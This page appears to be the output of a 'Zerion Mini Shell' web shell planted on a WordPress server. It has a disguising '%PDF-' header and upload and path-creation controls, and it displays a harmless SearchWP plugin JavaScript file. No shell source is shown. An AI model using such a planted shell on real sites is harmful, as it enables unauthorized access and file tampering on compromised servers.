%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/cwg/wp-content/plugins/searchwp/assets/javascript/src/Mixins/
Upload File :
Create Path :
Current File : //var/www/cwg/wp-content/plugins/searchwp/assets/javascript/src/Mixins/SourceAttribute.js

export const SourceAttribute = {
	methods: {
		isApplicable: function(attribute) {
			// An attribute is Applicable if it has settings. Settings can be an
			// integer weight or if the attribute has options it will be an object.
			if (attribute.settings && 'object'===typeof attribute.settings && Object.keys(attribute.settings).length===0) {
				return false;
			}

			if (!attribute.settings) {
				return false;
			}

			return true;
		}
	}
}

Zerion Mini Shell 1.0